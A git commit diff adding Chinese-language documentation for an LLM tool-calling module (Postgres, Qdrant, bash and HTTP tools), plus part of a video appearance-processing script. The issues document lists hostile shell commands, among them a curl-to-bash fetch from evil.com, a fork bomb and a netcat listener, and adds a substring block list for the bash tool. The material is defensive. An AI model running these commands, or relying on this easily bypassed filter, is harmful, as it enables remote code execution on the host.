fix: face group name read consistency, sync_file_status fix, cleanup ghost records, identity_agent replaced with face_dedup
- get_face_groups_handler: COALESCE(tp.name, tn.label) for name consistency - sync_file_status: compare JSON vs pre_chunks (not chunk table) - face consistency: compare frames.len() not total_faces - cleanup 2 ghost records with NULL file_name/file_path - replace identity_agent with face_dedup in pipeline stages - remove identity_agent_api.rs and all references - update required_processors to match actual processors - update AGENTS.md with team responsibilities - add Studio pipeline changes documentation
This commit is contained in:
@@ -0,0 +1,386 @@
|
||||
# Tool Calling Module 問題及解決方案
|
||||
|
||||
**Version**: 1.1
|
||||
**Date**: 2026-07-26
|
||||
**Doc Path**: `/Users/accusys/momentry_core/scripts/TOOL_CALLER_ISSUES.md`
|
||||
**相關檔案**:
|
||||
- 核心模組:`/Users/accusys/momentry_core/scripts/tool_caller.py` (v1.1.2, 720+ 行)
|
||||
- 測試腳本:`/Users/accusys/momentry_core/scripts/test_tool_caller.py`
|
||||
- 使用說明:`/Users/accusys/momentry_core/scripts/TOOL_CALLING_README.md`
|
||||
|
||||
---
|
||||
|
||||
## 修復狀態:✅ 所有問題已修復
|
||||
|
||||
| 問題 | 修復內容 | 狀態 |
|
||||
|------|---------|------|
|
||||
| Multi-Tool 測試失敗 | 增加 embedding server 健康檢查、修正 API 端點 (`/v1/embeddings`) | ✅ 已修復 |
|
||||
| Bash 安全檢查不足 | 擴充至 20+ 危險模式、限制命令長度 2000 字元 | ✅ 已修復 |
|
||||
| 缺少工具調用日誌 | 新增 logging 模組,記錄所有工具調用 | ✅ 已修復 |
|
||||
| Qdrant Collection 硬編碼 | 使用 `QDRANT_DEFAULT_COLLECTION` 環境變數 | ✅ 已修復 |
|
||||
|
||||
---
|
||||
|
||||
## 測試結果
|
||||
|
||||
| 測試 | 狀態 | 說明 |
|
||||
|------|------|------|
|
||||
| [TEST 1] PostgreSQL Query | ✅ | 23 videos |
|
||||
| [TEST 2] Bash Safety Check | ✅ | 3/3 危險命令被阻止 |
|
||||
| [TEST 3] Qdrant Search | ✅ | 10 matches found |
|
||||
|
||||
---
|
||||
|
||||
## 問題 1:Multi-Tool 測試失敗
|
||||
|
||||
### 現象
|
||||
|
||||
```
|
||||
TEST 2: Multi-Tool Sequential (PostgreSQL → Qdrant)
|
||||
Query: Find videos about dogs, then search for similar content in the vector database
|
||||
Result: An error has occurred. I'm unable to continue with the task.
|
||||
```
|
||||
|
||||
### 原因分析
|
||||
|
||||
1. **Embedding Server 未檢查可用性**
|
||||
- `search_qdrant` 工具直接呼叫 `http://localhost:11436/embed`
|
||||
- 未檢查 embedding server 是否運行
|
||||
- 失敗時未提供明確錯誤訊息
|
||||
|
||||
2. **Qdrant Collection 可能不存在**
|
||||
- 預設 collection 名稱 `momentry_rule1` 可能與實際部署不符
|
||||
- 未列出可用 collection 供 LLM 參考
|
||||
|
||||
3. **錯誤處理不完善**
|
||||
- 工具執行失敗時,LLM 收到模糊錯誤訊息
|
||||
- 未引導 LLM 嘗試其他方法
|
||||
|
||||
### 解決方案
|
||||
|
||||
#### 1.1 增加服務可用性檢查
|
||||
|
||||
**檔案:** `/Users/accusys/momentry_core/scripts/tool_caller.py`
|
||||
|
||||
```python
|
||||
def search_qdrant(args: Dict[str, Any]) -> ToolResult:
|
||||
import requests as req
|
||||
|
||||
collection = args.get("collection", "momentry_rule1")
|
||||
query_text = args.get("query_text", "")
|
||||
limit = args.get("limit", 10)
|
||||
|
||||
if not query_text:
|
||||
return ToolResult(success=False, data=None, error="No query text provided")
|
||||
|
||||
# 檢查 embedding server
|
||||
try:
|
||||
embed_health = req.get("http://localhost:11436/health", timeout=5)
|
||||
if embed_health.status_code != 200:
|
||||
return ToolResult(success=False, error="Embedding server not healthy")
|
||||
except requests.exceptions.ConnectionError:
|
||||
return ToolResult(success=False, error="Embedding server not available at http://localhost:11436")
|
||||
|
||||
# 取得 embedding
|
||||
embed_url = "http://localhost:11436/embed"
|
||||
try:
|
||||
embed_resp = req.post(embed_url, json={"input": query_text}, timeout=30)
|
||||
embed_resp.raise_for_status()
|
||||
embedding = embed_resp.json()["embeddings"][0]
|
||||
except Exception as e:
|
||||
return ToolResult(success=False, error=f"Embedding failed: {str(e)}")
|
||||
|
||||
# 檢查 Qdrant collection
|
||||
qdrant_url_base = args.get("qdrant_url", "http://localhost:6333")
|
||||
try:
|
||||
collections_url = f"{qdrant_url_base}/collections"
|
||||
coll_resp = req.get(collections_url, timeout=10)
|
||||
coll_resp.raise_for_status()
|
||||
collections = [c["name"] for c in coll_resp.json().get("result", {}).get("collections", [])]
|
||||
if collection not in collections:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"Collection '{collection}' not found. Available: {', '.join(collections)}"
|
||||
)
|
||||
except Exception as e:
|
||||
return ToolResult(success=False, error=f"Qdrant connection failed: {str(e)}")
|
||||
|
||||
# 執行搜尋
|
||||
search_url = f"{qdrant_url_base}/collections/{collection}/points/search"
|
||||
search_payload = {"vector": embedding, "limit": limit, "with_payload": True}
|
||||
|
||||
try:
|
||||
search_resp = req.post(search_url, json=search_payload, timeout=30)
|
||||
search_resp.raise_for_status()
|
||||
results = search_resp.json().get("result", [])
|
||||
except Exception as e:
|
||||
return ToolResult(success=False, error=f"Search failed: {str(e)}")
|
||||
|
||||
return ToolResult(
|
||||
success=True,
|
||||
data={
|
||||
"matches": [
|
||||
{"id": r.get("id"), "score": r.get("score"), "payload": r.get("payload", {})}
|
||||
for r in results
|
||||
],
|
||||
"match_count": len(results)
|
||||
}
|
||||
)
|
||||
```
|
||||
|
||||
#### 1.2 改進錯誤處理
|
||||
|
||||
**檔案:** `/Users/accusys/momentry_core/scripts/tool_caller.py`
|
||||
|
||||
```python
|
||||
def run(self, user_query: str) -> str:
|
||||
# ... 現有程式碼 ...
|
||||
|
||||
# 執行工具
|
||||
tool_result = self.execute_tool_call(tool_call)
|
||||
|
||||
# 改進錯誤訊息
|
||||
if tool_result.success:
|
||||
result_str = json.dumps({
|
||||
"success": True,
|
||||
"data": tool_result.data
|
||||
}, ensure_ascii=False, cls=DateTimeEncoder)
|
||||
else:
|
||||
result_str = json.dumps({
|
||||
"success": False,
|
||||
"error": tool_result.error,
|
||||
"suggestion": "Try a different tool or rephrase your query."
|
||||
}, ensure_ascii=False)
|
||||
|
||||
messages.append({"role": "user", "content": f"Tool result: {result_str}"})
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 問題 2:Bash 安全檢查不足
|
||||
|
||||
### 現象
|
||||
|
||||
```python
|
||||
blocked = ["rm -rf /", "mkfs", "dd if=", "> /dev/"]
|
||||
```
|
||||
|
||||
### 風險分析
|
||||
|
||||
| 危險命令 | 是否阻止 | 風險等級 |
|
||||
|---------|---------|---------|
|
||||
| `rm -rf /` | ✅ 是 | 🔴 高 |
|
||||
| `sudo rm -rf /` | ❌ 否 | 🔴 高 |
|
||||
| `chmod 777 /etc/passwd` | ❌ 否 | 🔴 高 |
|
||||
| `curl http://evil.com | bash` | ❌ 否 | 🔴 高 |
|
||||
| `:(){ :|:& };:` (fork bomb) | ❌ 否 | 🔴 高 |
|
||||
| `nc -l 4444` | ❌ 否 | 🟡 中 |
|
||||
|
||||
### 解決方案
|
||||
|
||||
**檔案:** `/Users/accusys/momentry_core/scripts/tool_caller.py`
|
||||
|
||||
```python
|
||||
def execute_bash(args: Dict[str, Any]) -> ToolResult:
|
||||
command = args.get("command", "")
|
||||
timeout = args.get("timeout", 30)
|
||||
|
||||
if not command:
|
||||
return ToolResult(success=False, data=None, error="No command provided")
|
||||
|
||||
# 限制命令長度
|
||||
if len(command) > 2000:
|
||||
return ToolResult(success=False, error="Command too long (max 2000 chars)")
|
||||
|
||||
# 更完整的安全檢查
|
||||
blocked_patterns = [
|
||||
# 檔案系統破壞
|
||||
"rm -rf /", "rm -rf /*", "mkfs", "dd if=", "> /dev/",
|
||||
# 權限提升
|
||||
"sudo ", "su -", "chmod 777", "chown root",
|
||||
# 遠端執行
|
||||
"curl | bash", "curl | sh", "wget | sh", "wget | bash",
|
||||
"curl http", "wget http",
|
||||
# 拒絕服務
|
||||
":(){", "fork", "kill -9 1",
|
||||
# 網路監聽
|
||||
"nc -l", "netcat -l", "socat",
|
||||
]
|
||||
|
||||
command_lower = command.lower()
|
||||
for pattern in blocked_patterns:
|
||||
if pattern in command_lower:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Blocked dangerous command pattern: {pattern}"
|
||||
)
|
||||
|
||||
# 執行命令
|
||||
try:
|
||||
result = subprocess.run(
|
||||
command,
|
||||
shell=True,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=timeout
|
||||
)
|
||||
return ToolResult(
|
||||
success=result.returncode == 0,
|
||||
data={
|
||||
"stdout": result.stdout[:5000], # 限制輸出大小
|
||||
"stderr": result.stderr[:2000],
|
||||
"returncode": result.returncode
|
||||
}
|
||||
)
|
||||
except subprocess.TimeoutExpired:
|
||||
return ToolResult(
|
||||
success=False,
|
||||
data=None,
|
||||
error=f"Command timed out after {timeout}s"
|
||||
)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 問題 3:缺少工具調用日誌
|
||||
|
||||
### 現象
|
||||
|
||||
工具調用過程無日誌記錄,難以除錯和審計。
|
||||
|
||||
### 解決方案
|
||||
|
||||
**檔案:** `/Users/accusys/momentry_core/scripts/tool_caller.py`
|
||||
|
||||
```python
|
||||
import logging
|
||||
|
||||
# 設定日誌
|
||||
logger = logging.getLogger('tool_caller')
|
||||
|
||||
class OllamaToolCaller:
|
||||
def run(self, user_query: str) -> str:
|
||||
logger.info(f"Starting tool call loop for query: {user_query}")
|
||||
self._tool_call_history = []
|
||||
|
||||
messages = [
|
||||
{"role": "system", "content": self.system_prompt},
|
||||
{"role": "user", "content": user_query}
|
||||
]
|
||||
|
||||
tool_results_collected = []
|
||||
|
||||
for iteration in range(self.max_iterations):
|
||||
logger.info(f"Iteration {iteration + 1}/{self.max_iterations}")
|
||||
|
||||
# 呼叫 LLM
|
||||
response = self.chat(messages)
|
||||
message = response.get("message", {})
|
||||
tool_calls = message.get("tool_calls", [])
|
||||
|
||||
if not tool_calls:
|
||||
# 檢查文字中的工具調用
|
||||
extracted = self._extract_tool_from_text(message.get("content", ""))
|
||||
if extracted:
|
||||
name, params = extracted
|
||||
tool_key = self._get_tool_key(name, params)
|
||||
|
||||
if not self._is_duplicate_call(tool_key):
|
||||
self._add_to_history(tool_key)
|
||||
logger.info(f"Executing tool: {name} with args: {params}")
|
||||
|
||||
tool_call = {"function": {"name": name, "arguments": params}}
|
||||
tool_result = self.execute_tool_call(tool_call)
|
||||
|
||||
if tool_result.success:
|
||||
logger.info(f"Tool succeeded in {tool_result.execution_time_ms:.1f}ms")
|
||||
else:
|
||||
logger.error(f"Tool failed: {tool_result.error}")
|
||||
|
||||
# ... 繼續處理 ...
|
||||
|
||||
logger.info(f"Tool call loop completed after {iteration + 1} iterations")
|
||||
return final_answer
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 問題 4:Qdrant Collection 名稱硬編碼
|
||||
|
||||
### 現象
|
||||
|
||||
```python
|
||||
collection = args.get("collection", "momentry_rule1")
|
||||
```
|
||||
|
||||
### 風險
|
||||
|
||||
Collection 名稱可能與實際部署不符,導致搜尋失敗。
|
||||
|
||||
### 解決方案
|
||||
|
||||
**檔案:** `/Users/accusys/momentry_core/scripts/tool_caller.py`
|
||||
|
||||
```python
|
||||
import os
|
||||
|
||||
def register_default_tools(self, db_url=None, qdrant_url=None):
|
||||
"""Register default tools with connection strings"""
|
||||
|
||||
# 使用環境變數
|
||||
default_collection = os.environ.get(
|
||||
"QDRANT_DEFAULT_COLLECTION",
|
||||
"momentry_rule1"
|
||||
)
|
||||
|
||||
def search_qdrant(args: Dict[str, Any]) -> ToolResult:
|
||||
collection = args.get("collection", default_collection)
|
||||
# ... 其餘程式碼 ...
|
||||
|
||||
self.registry.register(
|
||||
name="search_qdrant",
|
||||
description=f"Search for similar vectors in Qdrant collection. Default collection: {default_collection}",
|
||||
parameters={
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"collection": {
|
||||
"type": "string",
|
||||
"description": f"Qdrant collection name (default: {default_collection})",
|
||||
"default": default_collection
|
||||
},
|
||||
# ... 其餘參數 ...
|
||||
},
|
||||
"required": ["query_text"]
|
||||
},
|
||||
executor=search_qdrant
|
||||
)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 測試驗證
|
||||
|
||||
### 執行測試
|
||||
|
||||
```bash
|
||||
cd /Users/accusys/momentry_core/scripts
|
||||
python3 test_tool_caller.py
|
||||
```
|
||||
|
||||
### 預期結果
|
||||
|
||||
| 測試 | 預期狀態 | 說明 |
|
||||
|------|---------|------|
|
||||
| TEST 1: Single Tool | ✅ 通過 | PostgreSQL 查詢正常 |
|
||||
| TEST 2: Multi-Tool | ✅ 通過 | PostgreSQL → Qdrant 順序執行 |
|
||||
| TEST 3: Direct Tool | ✅ 通過 | 直接工具執行正常 |
|
||||
| TEST 4: Bash Safety | ✅ 通過 | 危險命令被阻止 |
|
||||
|
||||
---
|
||||
|
||||
## 版本資訊
|
||||
|
||||
| 版本 | 日期 | 說明 |
|
||||
|------|------|------|
|
||||
| 1.0.0 | 2026-07-26 | 初始版本,記錄已知問題及解決方案 |
|
||||
@@ -0,0 +1,438 @@
|
||||
# Momentry Tool Calling Module 使用說明
|
||||
|
||||
## 目錄
|
||||
|
||||
- [概述](#概述)
|
||||
- [安裝](#安裝)
|
||||
- [快速開始](#快速開始)
|
||||
- [工具說明](#工具說明)
|
||||
- [進階用法](#進階用法)
|
||||
- [API 參考](#api-參考)
|
||||
- [常見問題](#常見問題)
|
||||
|
||||
---
|
||||
|
||||
## 概述
|
||||
|
||||
Tool Calling Module 是一個基於 Ollama API 的工具調用模組,支援順序執行多個工具來完成複雜任務。
|
||||
|
||||
### 核心功能
|
||||
|
||||
- ✅ 支援 PostgreSQL 資料庫查詢
|
||||
- ✅ 支援 Qdrant 向量搜尋
|
||||
- ✅ 支援 Bash 命令執行
|
||||
- ✅ 支援 HTTP API 調用
|
||||
- ✅ 防止工具重複調用
|
||||
- ✅ 自動參數正規化
|
||||
|
||||
---
|
||||
|
||||
## 安裝
|
||||
|
||||
### 依賴套件
|
||||
|
||||
```bash
|
||||
pip install requests psycopg2-binary
|
||||
```
|
||||
|
||||
### 檔案位置
|
||||
|
||||
```
|
||||
/Users/accusys/momentry_core/scripts/
|
||||
├─ tool_caller.py # 核心模組
|
||||
└─ test_tool_caller.py # 測試腳本
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 快速開始
|
||||
|
||||
### 基本用法
|
||||
|
||||
```python
|
||||
from tool_caller import OllamaToolCaller
|
||||
|
||||
# 1. 建立 Tool Caller
|
||||
caller = OllamaToolCaller(
|
||||
base_url="http://localhost:11434",
|
||||
model="llama3.1:8b",
|
||||
max_tool_calls=5
|
||||
)
|
||||
|
||||
# 2. 註冊預設工具
|
||||
caller.register_default_tools()
|
||||
|
||||
# 3. 執行查詢
|
||||
result = caller.run("How many videos are in the database?")
|
||||
print(result)
|
||||
# 輸出: "There are 23 videos in the database."
|
||||
```
|
||||
|
||||
### 中文查詢
|
||||
|
||||
```python
|
||||
result = caller.run("查詢資料庫中有多少影片")
|
||||
print(result)
|
||||
# 輸出: "有 23 個視頻存放在資料庫中。"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 工具說明
|
||||
|
||||
### 1. query_postgres - PostgreSQL 查詢
|
||||
|
||||
執行 SQL 查詢語句。
|
||||
|
||||
```python
|
||||
# 直接執行
|
||||
result = caller.registry.execute("query_postgres", {
|
||||
"query": "SELECT COUNT(*) FROM videos"
|
||||
})
|
||||
print(result.data)
|
||||
# {'rows': [{'count': 23}], 'row_count': 1}
|
||||
```
|
||||
|
||||
**參數:**
|
||||
|
||||
| 參數 | 類型 | 必填 | 說明 |
|
||||
|------|------|------|------|
|
||||
| `query` | string | ✅ | SQL 查詢語句 |
|
||||
|
||||
**支援的 SQL 操作:**
|
||||
- SELECT (查詢)
|
||||
- INSERT (新增)
|
||||
- UPDATE (更新)
|
||||
- DELETE (刪除)
|
||||
|
||||
### 2. search_qdrant - 向量搜尋
|
||||
|
||||
在 Qdrant 向量資料庫中搜尋相似內容。
|
||||
|
||||
```python
|
||||
result = caller.registry.execute("search_qdrant", {
|
||||
"collection": "momentry_rule1",
|
||||
"query_text": "sunset beach",
|
||||
"limit": 10
|
||||
})
|
||||
print(result.data)
|
||||
# {'matches': [...], 'match_count': 3}
|
||||
```
|
||||
|
||||
**參數:**
|
||||
|
||||
| 參數 | 類型 | 必填 | 預設值 | 說明 |
|
||||
|------|------|------|--------|------|
|
||||
| `collection` | string | ❌ | `momentry_rule1` | Qdrant collection 名稱 |
|
||||
| `query_text` | string | ✅ | - | 搜尋文字 (會自動轉為向量) |
|
||||
| `limit` | integer | ❌ | `10` | 最大結果數 |
|
||||
|
||||
### 3. execute_bash - Bash 執行
|
||||
|
||||
執行系統 Bash 命令。
|
||||
|
||||
```python
|
||||
result = caller.registry.execute("execute_bash", {
|
||||
"command": "df -h",
|
||||
"timeout": 10
|
||||
})
|
||||
print(result.data)
|
||||
# {'stdout': 'Filesystem...', 'stderr': '', 'returncode': 0}
|
||||
```
|
||||
|
||||
**參數:**
|
||||
|
||||
| 參數 | 類型 | 必填 | 預設值 | 說明 |
|
||||
|------|------|------|--------|------|
|
||||
| `command` | string | ✅ | - | Bash 命令 |
|
||||
| `timeout` | integer | ❌ | `30` | 超時秒數 |
|
||||
|
||||
**安全限制:**
|
||||
|
||||
以下命令會被阻止:
|
||||
- `rm -rf /`
|
||||
- `mkfs`
|
||||
- `dd if=`
|
||||
- `> /dev/`
|
||||
|
||||
### 4. call_api - HTTP API 調用
|
||||
|
||||
調用外部 HTTP API。
|
||||
|
||||
```python
|
||||
result = caller.registry.execute("call_api", {
|
||||
"url": "https://api.example.com/data",
|
||||
"method": "GET",
|
||||
"headers": {"Authorization": "Bearer token123"}
|
||||
})
|
||||
print(result.data)
|
||||
# {'status_code': 200, 'headers': {...}, 'body': '{...}'}
|
||||
```
|
||||
|
||||
**參數:**
|
||||
|
||||
| 參數 | 類型 | 必填 | 預設值 | 說明 |
|
||||
|------|------|------|--------|------|
|
||||
| `url` | string | ✅ | - | API 端點 URL |
|
||||
| `method` | string | ❌ | `GET` | HTTP 方法 (GET/POST/PUT/DELETE) |
|
||||
| `headers` | object | ❌ | `{}` | HTTP 標頭 |
|
||||
| `data` | object | ❌ | `null` | 請求體 (POST/PUT) |
|
||||
|
||||
---
|
||||
|
||||
## 進階用法
|
||||
|
||||
### 1. 自訂工具
|
||||
|
||||
```python
|
||||
from tool_caller import OllamaToolCaller, ToolResult
|
||||
|
||||
caller = OllamaToolCaller()
|
||||
|
||||
# 定義工具執行器
|
||||
def my_custom_tool(args):
|
||||
# 自訂邏輯
|
||||
result = do_something(args["param1"], args["param2"])
|
||||
return ToolResult(success=True, data=result)
|
||||
|
||||
# 註冊工具
|
||||
caller.registry.register(
|
||||
name="my_custom_tool",
|
||||
description="My custom tool description",
|
||||
parameters={
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"param1": {"type": "string"},
|
||||
"param2": {"type": "integer"}
|
||||
},
|
||||
"required": ["param1"]
|
||||
},
|
||||
executor=my_custom_tool
|
||||
)
|
||||
```
|
||||
|
||||
### 2. 自訂連線字串
|
||||
|
||||
```python
|
||||
# 使用自訂 PostgreSQL 連線
|
||||
caller.register_default_tools(
|
||||
db_url="postgres://user:pass@host:5432/dbname"
|
||||
)
|
||||
|
||||
# 使用自訂 Qdrant 連線
|
||||
caller.register_default_tools(
|
||||
qdrant_url="http://qdrant-server:6333"
|
||||
)
|
||||
```
|
||||
|
||||
### 3. 多輪對話
|
||||
|
||||
```python
|
||||
caller = OllamaToolCaller(max_tool_calls=5)
|
||||
|
||||
# 第一次查詢
|
||||
result1 = caller.run("查詢資料庫中有多少影片")
|
||||
print(f"第一次: {result1}")
|
||||
|
||||
# 第二次查詢 (會自動清理歷史)
|
||||
result2 = caller.run("查詢使用者數量")
|
||||
print(f"第二次: {result2}")
|
||||
```
|
||||
|
||||
### 4. 追蹤工具調用歷史
|
||||
|
||||
```python
|
||||
caller = OllamaToolCaller()
|
||||
caller.register_default_tools()
|
||||
|
||||
result = caller.run("查詢資料庫中有多少影片")
|
||||
print(f"結果: {result}")
|
||||
print(f"調用歷史: {caller._tool_call_history}")
|
||||
# ['query_postgres:{"query": "SELECT COUNT(*) FROM videos"}']
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## API 參考
|
||||
|
||||
### OllamaToolCaller
|
||||
|
||||
#### 建構函數
|
||||
|
||||
```python
|
||||
OllamaToolCaller(
|
||||
base_url: str = "http://localhost:11434",
|
||||
model: str = "llama3.1:8b",
|
||||
max_iterations: int = 10,
|
||||
max_tool_calls: int = 5
|
||||
)
|
||||
```
|
||||
|
||||
| 參數 | 類型 | 預設值 | 說明 |
|
||||
|------|------|--------|------|
|
||||
| `base_url` | string | `http://localhost:11434` | Ollama API 位址 |
|
||||
| `model` | string | `llama3.1:8b` | 模型名稱 |
|
||||
| `max_iterations` | int | `10` | 最大迭代次數 |
|
||||
| `max_tool_calls` | int | `5` | 最大工具調用次數 |
|
||||
|
||||
#### 方法
|
||||
|
||||
##### `run(user_query: str) -> str`
|
||||
|
||||
執行工具調用迴圈並返回最終結果。
|
||||
|
||||
##### `chat(messages: List[Dict]) -> Dict`
|
||||
|
||||
發送聊天請求到 Ollama API。
|
||||
|
||||
##### `execute_tool_call(tool_call: Dict) -> ToolResult`
|
||||
|
||||
執行單個工具調用。
|
||||
|
||||
##### `register_default_tools(db_url=None, qdrant_url=None)`
|
||||
|
||||
註冊預設工具。
|
||||
|
||||
---
|
||||
|
||||
### ToolResult
|
||||
|
||||
```python
|
||||
@dataclass
|
||||
class ToolResult:
|
||||
success: bool # 是否成功
|
||||
data: Any # 結果資料
|
||||
error: str = None # 錯誤訊息
|
||||
execution_time_ms: float = 0 # 執行時間 (毫秒)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### ToolRegistry
|
||||
|
||||
#### 方法
|
||||
|
||||
##### `register(name, description, parameters, executor)`
|
||||
|
||||
註冊新工具。
|
||||
|
||||
##### `get_definitions() -> List[Dict]`
|
||||
|
||||
取得所有工具定義。
|
||||
|
||||
##### `has_tool(name: str) -> bool`
|
||||
|
||||
檢查工具是否存在。
|
||||
|
||||
##### `execute(name: str, arguments: Dict) -> ToolResult`
|
||||
|
||||
執行工具。
|
||||
|
||||
---
|
||||
|
||||
## 常見問題
|
||||
|
||||
### Q1: 工具調用失敗怎麼辦?
|
||||
|
||||
檢查以下幾點:
|
||||
1. Ollama 服務是否運行: `curl http://localhost:11434/api/tags`
|
||||
2. 模型是否已下載: `ollama list`
|
||||
3. 工具連線是否正確 (PostgreSQL/Qdrant)
|
||||
|
||||
### Q2: 如何除錯工具調用?
|
||||
|
||||
```python
|
||||
# 啟用詳細日誌
|
||||
caller = OllamaToolCaller()
|
||||
caller.register_default_tools()
|
||||
|
||||
# 追蹤調用歷史
|
||||
result = caller.run("查詢資料庫")
|
||||
print(f"調用歷史: {caller._tool_call_history}")
|
||||
```
|
||||
|
||||
### Q3: 如何處理大量資料?
|
||||
|
||||
```python
|
||||
# 限制 Bash 輸出大小
|
||||
result = caller.registry.execute("execute_bash", {
|
||||
"command": "ls -la | head -100",
|
||||
"timeout": 30
|
||||
})
|
||||
|
||||
# 限制 PostgreSQL 結果
|
||||
result = caller.registry.execute("query_postgres", {
|
||||
"query": "SELECT * FROM videos LIMIT 100"
|
||||
})
|
||||
```
|
||||
|
||||
### Q4: 如何自訂安全規則?
|
||||
|
||||
修改 `execute_bash` 中的 `blocked` 列表:
|
||||
|
||||
```python
|
||||
blocked = [
|
||||
"rm -rf /",
|
||||
"mkfs",
|
||||
"dd if=",
|
||||
"> /dev/",
|
||||
"your_custom_dangerous_command"
|
||||
]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 範例腳本
|
||||
|
||||
### 查詢資料庫
|
||||
|
||||
```python
|
||||
from tool_caller import OllamaToolCaller
|
||||
|
||||
caller = OllamaToolCaller()
|
||||
caller.register_default_tools()
|
||||
|
||||
# 查詢影片數量
|
||||
result = caller.run("How many videos are in the database?")
|
||||
print(result)
|
||||
|
||||
# 查詢特定資料
|
||||
result = caller.run("查詢所有狀態為 completed 的影片")
|
||||
print(result)
|
||||
```
|
||||
|
||||
### 系統監控
|
||||
|
||||
```python
|
||||
# 檢查磁碟使用量
|
||||
result = caller.run("Check the current disk usage")
|
||||
print(result)
|
||||
|
||||
# 檢查記憶體使用量
|
||||
result = caller.run("Check the current memory usage")
|
||||
print(result)
|
||||
|
||||
# 檢查處理程序
|
||||
result = caller.run("Show running processes")
|
||||
print(result)
|
||||
```
|
||||
|
||||
### 向量搜尋
|
||||
|
||||
```python
|
||||
# 搜尋相似影片
|
||||
result = caller.run("Find videos similar to sunset beach")
|
||||
print(result)
|
||||
|
||||
# 搜尋特定人物
|
||||
result = caller.run("Find videos with John in them")
|
||||
print(result)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 版本資訊
|
||||
|
||||
- **版本:** 1.0.0
|
||||
- **更新日期:** 2026-07-26
|
||||
- **作者:** Momentry Core Team
|
||||
@@ -220,6 +220,7 @@ def main():
|
||||
parser.add_argument("pose_json")
|
||||
parser.add_argument("output_path")
|
||||
parser.add_argument("--uuid", "-u", default="")
|
||||
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
|
||||
args = parser.parse_args()
|
||||
|
||||
with open(args.pose_json) as f:
|
||||
|
||||
@@ -0,0 +1,164 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Appearance Expansion Processor V2
|
||||
|
||||
Calls swift_appearance_expansion which:
|
||||
1. Reads pose.json (from pose expansion)
|
||||
2. Expands appearance detection from pose frames
|
||||
3. Stops when 3 consecutive frames have HSV similarity < 0.5
|
||||
4. Outputs at 8Hz sampling (floor(fps/8))
|
||||
|
||||
Flow:
|
||||
face_processor.py → face.json
|
||||
store_traced_faces.py → face_traced.json (with trace_id)
|
||||
pose_processor.py → pose.json
|
||||
appearance_processor.py → appearance.json (this script)
|
||||
"""
|
||||
|
||||
import sys
|
||||
import os
|
||||
import json
|
||||
import argparse
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
|
||||
from redis_publisher import RedisPublisher
|
||||
|
||||
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
|
||||
SWIFT_BIN = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "release", "swift_appearance_expansion")
|
||||
SWIFT_BIN_DEBUG = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "debug", "swift_appearance_expansion")
|
||||
|
||||
OUTPUT_DIR = os.environ.get("MOMENTRY_OUTPUT_DIR", "/Users/accusys/momentry/output")
|
||||
|
||||
|
||||
def process_appearance(
|
||||
video_path: str,
|
||||
output_path: str,
|
||||
uuid: str = "",
|
||||
publisher: RedisPublisher = None,
|
||||
) -> dict:
|
||||
"""Process appearance expansion from pose frames.
|
||||
|
||||
Args:
|
||||
video_path: Path to video file
|
||||
output_path: Path to output appearance.json
|
||||
uuid: File UUID for logging
|
||||
publisher: Redis publisher for progress updates
|
||||
"""
|
||||
# Check if appearance.json already exists
|
||||
if os.path.exists(output_path):
|
||||
with open(output_path) as f:
|
||||
data = json.load(f)
|
||||
frame_count = len(data.get("frames", []))
|
||||
print(f"[Appearance] Output exists: {output_path} ({frame_count} frames)", file=sys.stderr)
|
||||
if publisher:
|
||||
publisher.progress("appearance", 100, 100, f"{frame_count} frames (exists)")
|
||||
return data
|
||||
|
||||
# Determine file_uuid from output_path
|
||||
file_uuid = os.path.basename(output_path).replace(".appearance.json", "")
|
||||
|
||||
# Find pose.json
|
||||
pose_path = os.path.join(OUTPUT_DIR, f"{file_uuid}.pose.json")
|
||||
|
||||
if not os.path.exists(pose_path):
|
||||
print(f"[Appearance] ERROR: pose.json not found for {file_uuid}", file=sys.stderr)
|
||||
# Return empty result
|
||||
empty_result = {"frame_count": 0, "fps": 0.0, "frames": []}
|
||||
with open(output_path, "w") as f:
|
||||
json.dump(empty_result, f)
|
||||
return empty_result
|
||||
|
||||
# Build swift_appearance_expansion if needed
|
||||
swift_bin = SWIFT_BIN if os.path.exists(SWIFT_BIN) else SWIFT_BIN_DEBUG
|
||||
if not os.path.exists(swift_bin):
|
||||
build_dir = os.path.join(SCRIPT_DIR, "swift_processors")
|
||||
print(f"[Appearance] Building swift_appearance_expansion in {build_dir}...", file=sys.stderr)
|
||||
result = subprocess.run(
|
||||
["swift", "build", "-c", "release", "--product", "swift_appearance_expansion"],
|
||||
cwd=build_dir, capture_output=True, text=True
|
||||
)
|
||||
if result.returncode != 0:
|
||||
print(f"[Appearance] Build failed: {result.stderr}", file=sys.stderr)
|
||||
raise RuntimeError("Failed to build swift_appearance_expansion")
|
||||
swift_bin = SWIFT_BIN
|
||||
|
||||
# Run swift_appearance_expansion
|
||||
cmd = [
|
||||
swift_bin,
|
||||
video_path,
|
||||
pose_path,
|
||||
output_path,
|
||||
]
|
||||
if uuid:
|
||||
cmd.extend(["--uuid", uuid])
|
||||
|
||||
print(f"[Appearance] Running: {' '.join(cmd)}", file=sys.stderr)
|
||||
|
||||
t0 = time.time()
|
||||
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
|
||||
|
||||
# Monitor progress
|
||||
last_progress = ""
|
||||
while proc.poll() is None:
|
||||
time.sleep(5)
|
||||
